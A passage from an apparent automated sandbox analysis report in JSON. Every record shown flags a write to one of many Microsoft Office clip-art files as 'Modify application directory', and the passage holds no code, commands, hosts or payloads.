office\\clipart\\pub60cor\\j0324694.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38903", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0324694.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0324704.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0324704.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38910", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0324704.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0337280.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0337280.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38917", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0337280.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341328.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341328.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38924", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341328.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341344.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341344.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38931", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341344.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341439.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341439.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38938", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341439.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341447.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341447.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38947", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341447.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341448.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341448.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38956", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341448.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341455.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341455.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38965", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341455.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341475.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341475.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38974", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341475.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341499.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341499.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38985", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341499.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341534.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341534.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38992", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341534.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341551.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341551.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38999", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341551.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341554.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341554.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39008", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341554.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341557.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341557.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39017", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341557.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341559.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341559.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39026", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341559.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341561.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341561.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39035", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341561.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341634.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341634.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39046", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341634.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341636.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341636.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39053", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341636.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341645.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341645.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39060", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341645.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341653.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341653.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39067", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341653.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341654.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341654.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39074", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341654.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341738.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341738.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39081", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341738.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341742.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341742.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39090", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341742.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382836.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382836.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39099", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382836.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382925.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382925.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39114", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382925.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382926.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382926.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39135", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382926.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382927.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382927.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39152", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382927.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382930.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382930.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39173", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382930.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382931.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382931.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39192", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382931.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382938.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382938.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39213", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382938.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382939.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382939.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39232", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382939.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382942.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382942.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39251", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382942.jpg\".", 